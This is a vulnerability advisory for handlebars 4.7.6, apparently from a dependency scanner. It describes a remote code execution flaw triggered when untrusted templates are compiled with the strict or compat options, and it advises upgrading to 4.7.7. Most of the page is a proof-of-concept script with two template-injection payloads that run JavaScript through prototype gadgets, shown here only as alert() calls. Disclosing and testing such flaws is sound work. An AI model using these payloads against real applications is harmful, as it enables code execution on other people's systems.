handlebars@4.7.6

Vulnerabilities: 1 via 1 paths
Dependencies: 5
Source: npm


medium severity

Remote Code Execution (RCE)

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.6

Detailed paths

  • Introduced through: handlebars@4.7.6
    Remediation: Upgrade to handlebars@4.7.7.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when templates from an untrusted source are compiled with certain compiler options (the proof of concept below uses the `strict` and `compat` options).

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script>
<script>
// compile the template
var s = `
{{#with (__lookupGetter__ "__proto__")}}
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}}
{{#with ../constructor.prototype}}
{{../../constructor.defineProperty . "hasOwnProperty" ..}}
{{/with}}
{{/with}}
{{/with}}
{{#with "constructor"}}
{{#with split}}
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}}
{{#with .}}
{{#with (concat (lookup join (slice 0 1)))}}
{{#each (slice 2 3)}}
{{#with (apply 0 ../..)}}
{{.}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
`;

var s2 = `{{'a/.") || alert("Vulnerable Handlebars JS when compiling in compat mode'}}`;

var template = Handlebars.compile(s, {
  strict: true
});
var template = Handlebars.compile(s2, {
  compat: true
});
// execute the compiled template and print the output to the console
console.log(template({}));
</script>

Remediation

Upgrade handlebars to version 4.7.7 or higher.

References